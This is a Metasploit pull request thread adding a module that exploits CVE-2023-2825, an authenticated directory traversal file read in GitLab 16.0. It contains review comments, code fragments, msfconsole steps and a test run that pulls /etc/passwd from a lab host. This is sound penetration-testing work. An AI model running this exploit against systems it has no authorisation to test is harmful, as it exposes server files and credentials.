gitlab file read CVE-2023-2825
rapid7/metasploit-framework pull request #18039
Opened 2023-05-29 04:55 UTC by h00die

Fix #18038

This PR adds an exploit for an authenticated arbitrary file read on Github 16.0 (exclusively).  This is a 6-day exploit.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use auxiliary/scanner/http/gitlab_subgroups_file_read`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `set username [username]`
- [ ] DO: `set password [password]`
- [ ] Do: `run`
- [ ] You should be able to read an arbitrary file.
- [ ] **Document** looks good

2023-05-30 22:30 UTC, gwillcox-r7 requested changes

2023-05-30 22:30 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    project_id = res.headers['Location'].to_s.split('/')[3..].join('/') # strip off http[s]://ip/, seems like there should be a better way to do this though
This assumes that the Location header will contain at least 3 `/`'s which may not be the case if its something like `https://www.google.com`

2023-05-30 22:30 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    file_url = res['link']['url']
You should really be using `res.dig('link', 'url')` or similar here in case these entities don't exist in the response and then checking `file_url` to make sure its not `nil` afterwards.

2023-05-30 22:30 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    end
```suggestion
    if res.body.empty?
      print_error('Response has 0 size.')
    elsif res.code == 200
      print_good(res.body)
      loot_path = store_loot('Gitlab file', 'text/plain', ip, res.body, datastore['FILE'])
      print_good("#{datastore['FILE']} saved to #{loot_path}")
    else
      print_error('Bad response, initiating cleanup')
    end
```

Suggested simplification of logic here.

2023-05-31 00:09 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          ['URL', 'https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/'],
While this is true, I've never seen a gitlab which didn't require authentication during my pentest, let alone one with a minimum of 5 nested groups.  I figured that was such a far shot, it wasn't worth coding in.

I think it may be better to have 2 exploits, an unauth and an auth one for this.  Trying to loop through every project, check the groups depth, check if you can upload a file seems like a lot of code and looping that would significantly clutter this module.

2023-05-31 00:11 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          'user[role]' => 'software_developer',
I assume (since i copied it from the PoC) this is a built in group for Developer: https://docs.gitlab.com/ee/user/permissions.html

2023-05-31 13:54 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          ['URL', 'https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/'],
Sounds good to me just thought I'd call it out. I think we can skip the authentication point then but I would still like to see an explanation of the 5 level nesting requirement somewhere in the module to give people some more context to this bug.

2023-05-31 13:55 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          'user[role]' => 'software_developer',
Alright I'll mark this as resolved for now. If this does become an issue in the future though we can come back and reopen this point.

2023-05-31 19:29 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          ['URL', 'https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/'],
I'll do a `git mv` and rename these to `gitlab_authenticated_subgroups_file_read` to be more clear about the requirement as well

2023-05-31 19:32 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
I don't think this is possible since they're required options.

```
msf6 > use gitlab_authenticated
[*] Using auxiliary/scanner/http/gitlab_authenticated_subgroups_file_read
msf6 auxiliary(scanner/http/gitlab_authenticated_subgroups_file_read) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(scanner/http/gitlab_authenticated_subgroups_file_read) > run

[-] Msf::OptionValidateError The following options failed to validate: USERNAME, PASSWORD
```

2023-05-31 20:15 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
Huh interesting, I thought the `nil` default would go through, thanks for proving me wrong on this. Will mark as resolved, this is behaving as expected.

2023-05-31 21:03 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
should both be caught by the next rescue for `Msf::Exploit::Remote::HTTP::Gitlab::Error`?

2023-05-31 21:05 UTC, sempervictus commented
6-day on something used by a group of people who would argue about how to patch their leaky life raft is pretty brave :wink: - thanks for getting this published, really helps when having conversations w/ members of the aforementioned group.

2023-05-31 21:19 UTC, h00die commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +    file_url = res['link']['url']
didn't know about dig, nice!

2023-06-01 14:12 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          Gitlab version 16.0 contains an authenticated directory traversal for arbitrary file read as the gitlab user.
```suggestion
          GitLab version 16.0 contains an authenticated directory traversal for arbitrary file read as the 'gitlab' user.
```

2023-06-01 14:12 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +      loot_path = store_loot('Gitlab file', 'text/plain', ip, res.body, datastore['FILE'])
```suggestion
      loot_path = store_loot('GitLab file', 'text/plain', ip, res.body, datastore['FILE'])
```

2023-06-01 14:16 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
> +          'group[path]' => name,
@gwillcox-r7 Would you mind testing this web request once again gitlab.com. If it works and we believe the module would create groups on the public, main instance of GitLab then we should check the target and throw a warning that they are likely infringing on the terms of service.

2023-06-01 14:26 UTC, SelLa70 commented
Ok Thank You

Pada tanggal Sen, 29 Mei 2023 11.56, h00die ***@***.***>
menulis:

> Fix #18038 <https://github.com/rapid7/metasploit-framework/issues/18038>
>
> This PR adds an exploit for an authenticated arbitrary file read on Github
> 16.0 (exclusively). This is a 6-day exploit.
> Verification
>
>    - Start msfconsole
>    - Do: use auxiliary/scanner/http/gitlab_subgroups_file_read
>    - Do: set rhosts [ip]
>    - Do: set username [username]
>    - DO: set password [password]
>    - Do: run
>    - You should be able to read an arbitrary file.
>    - *Document* looks good
>
> ------------------------------
> You can view, comment on, or merge this pull request online at:
>
>   https://github.com/rapid7/metasploit-framework/pull/18039
> Commit Summary
>
>    - 0ccfa4a
>    <https://github.com/rapid7/metasploit-framework/pull/18039/commits/0ccfa4af876c17a81025d7c0a6576e1b67ee0df6>
>    gitlab file read CVE-2023-2825
>    - 01359e7
>    <https://github.com/rapid7/metasploit-framework/pull/18039/commits/01359e77a7b3833444b3ff6643b1c7005ad57b59>
>    gitlab file read CVE-2023-2825
>    - 5f308e0
>    <https://github.com/rapid7/metasploit-framework/pull/18039/commits/5f308e0176728df0cfb80cea2fff96a417fa5c3e>
>    gitlab file read CVE-2023-2825
>
> File Changes
>
> (2 files <https://github.com/rapid7/metasploit-framework/pull/18039/files>
> )
>
>    - *A*
>    documentation/modules/auxiliary/scanner/http/gitlab_subgroups_file_read.md
>    <https://github.com/rapid7/metasploit-framework/pull/18039/files#diff-cb25f529861d9530e0ef027ba42654915e10ee3ef472d8a8cb85c5d681882e22>
>    (135)
>    - *A* modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
>    <https://github.com/rapid7/metasploit-framework/pull/18039/files#diff-40f94cf9a64cdd80503713cb4726e3ec2856d5299fb5667d1997b43f56e66430>
>    (229)
>
> Patch Links:
>
>    - https://github.com/rapid7/metasploit-framework/pull/18039.patch
>    - https://github.com/rapid7/metasploit-framework/pull/18039.diff
>
> —
> Reply to this email directly, view it on GitHub
> <https://github.com/rapid7/metasploit-framework/pull/18039>, or
> unsubscribe
> <https://github.com/notifications/unsubscribe-auth/A3BVUUJD7GQKVBL5MROA3EDXIQT6BANCNFSM6AAAAAAYSKN7RI>
> .
> You are receiving this because you are subscribed to this thread.Message
> ID: ***@***.***>
>

2023-06-01 14:32 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb
Please refactor this as a `gather` module. We are working on expanding docs to be clear on this, with support for `RHOSTS` we would like to push `scanners` to be a in two categories `fingerprinting/check` or `login_scanner`.

Refactor will enabled support for a `check` method that can be used in combination with `RHOSTS` to also have this act as a true scanner for the issue without actually exercising it.

https://github.com/rapid7/metasploit-framework/pull/18003#discussion_r1211834611

2023-06-01 20:43 UTC, h00die commented
I'm going to go ahead and move this back to a draft since the changes are substantial

2023-06-02 22:08 UTC, h00die commented
I believe I've hit all the required changes, but i'm sure I missed something or introduced a new problem

2023-06-06 14:03 UTC, cdelafuente-r7 reviewed
Thanks @h00die! I just left a few comments and suggestions for you to review when you get a chance. Otherwise, it looks good and it works great! Thank you for refactoring it into a `gather` module.

2023-06-06 20:17 UTC, h00die commented on documentation/modules/auxiliary/gather/gitlab_authenticated_subgroups_file_read.md
> +sudo docker exec -it gitlab grep 'Password:' /etc/gitlab/initial_root_password[*] Processing gitlab.rb for ERB directives.
yea looks like a bad copy pasta when i went to put in a fresh run after all the changes

2023-06-07 11:08 UTC, cdelafuente-r7 commented
Thanks @h00die for updating this. Everything looks good to me now. I tested against GitLab version 16.0.0 on Ubuntu 20.04.4 and it works great. I'll go ahead and land it.

### Example output
```
msf6 auxiliary(gather/gitlab_authenticated_subgroups_file_read) > run verbose=true rhosts=192.168.100.119 username=root password=1jwnBU+k5MiMfzkUqtMZ7o9NcoD0orN1horHWKhVKGc=
[*] Running module against 192.168.100.119

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to get the GitLab version
[+] The target appears to be vulnerable. Detected GitLab version 16.0.0 which is vulnerable.
[+] CSRF Token: 5bX2uwt3RY6N8Iw4m23N7Aby1YoaLJdt245I7LiEkYmrZcNUqVWoJ5Gnx5I3L3_wKNW_vUSf0rdRcCZVa4NOzA
[*] Creating 11 groups
[*] Creating group: 3JN3bIh7
[+] CSRF Token: v18_0T7dfQgcI80nMGVQVNzP-0rIm5Ul7vnzDWxIfUbxjwo-nP-QoQB0ho2cJ-JI8uiRfZYo0P9kB520v0-iAw
[*] Creating child group: LuL9uawW with parent id: 74
[+] CSRF Token: P4lNhfWcBAq0C3jm6MwlVx0ImcpAeBRgySxstGw6NC1xWXhqV77po6hcM0xEjpdLMy_z_R7LUbpD0gINvz3raA
[*] Creating child group: IELnexek with parent id: 75
[+] CSRF Token: H6thKrkqDaqqvcKxz2ufPO7hghvKnsZEkhoFEmc96pdRe1TFGwjgA7bqiRtjKS0gwMboLJQtg54Y5GurtDo10g
[*] Creating child group: Gxy6XRSN with parent id: 76
[+] CSRF Token: j3eEZyEysdNQlxUziX-udQ-YB128SGMKETLXW_3guFrBp7GIgxBcekzAXpklPRxpIb9tauL7JtCbzLniLudnHw
[*] Creating child group: 7t3GvIyt with parent id: 77
[+] CSRF Token: b-scPM2BGG1CHz76YcoLIIR5-KadUXgj_IhXtL575OAhOynTb6P1xF5IdVDNiLk8ql6SkcPiPfl2djkNbXw7pQ
[*] Creating child group: 4XkYKb4z with parent id: 78
[+] CSRF Token: tnq0oc1RzEoaQ9Ycd2ulM6_jtbWDqeUfJSCP1oXssW34qoFOb3Mh4wYUnbbbKRcvgcTfgt0aoMWv3uFvVutuKA
[*] Creating child group: GtlAA7S6 with parent id: 79
[+] CSRF Token: OixMz4I-f5TlNguBRhiHl_KN2jBpL_EYgbAYJG1Kdax0_HkgIBySPflhQCvqWjWL3KqwBzectMILTnadvk2q6Q
[*] Creating child group: FIgLw6iS with parent id: 80
[+] CSRF Token: z4nGz_ZGMByWMI54gGwy4EDHe6an97H76hZV4A1uJcaBWfMgVGTdtYpnxdIsLoD8buARkflE9CFg6DtZ3mn6gw
[*] Creating child group: g5lTPVrs with parent id: 81
[+] CSRF Token: Gcxi3QhQyFhBA0b3Xs1BhyreiwJXJGIUWbOfIMZVo8VXHFcyqnIl8V1UDV3yj_ObBPnhNQmXJ87TTfGZFVJ8gA
[*] Creating child group: uBo6XLgI with parent id: 82
[+] CSRF Token: W2c0Jx2vTX_Raro1RgkTVHOFqxK9xWLSC7FsXxL8RiYVtwHIv42g1s098Z_qS6FIXaLBJeN2JwiBTwLmwfuZYw
[*] Creating child group: yKqBI7qD with parent id: 83
[+] CSRF Token: MWJXj9RnTXsCf3t2jJCfQJ30Ea7zTt0ZtAz4F-gsQy5_smJgdkWg0h4oMNwg0i1cs9N7ma39mMM-8pauOyucaw
[*] Creating project CNfBbUIe
[*] Creating a dummy file in project
[*] Executing dir traversal
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...[redacted]...

[+] /etc/passwd saved to /home/msfuser/.msf4/loot/20230607130228_default_192.168.100.119_GitLabfile_293936.txt
[*] Deleting group 3JN3bIh7
[*] Auxiliary module execution completed
msf6 auxiliary(gather/gitlab_authenticated_subgroups_file_read) > loot

Loot
====

host             service  type         name         content     info  path
----             -------  ----         ----         -------     ----  ----
192.168.100.119           GitLab file  /etc/passwd  text/plain        /home/msfuser/.msf4/loot/20230607130228_default_192.168.100.119_GitLabfile_293936.txt
```

2023-06-07 11:09 UTC, merged

2023-06-07 11:12 UTC, cdelafuente-r7 commented
# Release Notes
This adds an exploit leverages an authenticated arbitrary file read on Github 16.0.0. This vulnerability is identified as CVE-2023-2825.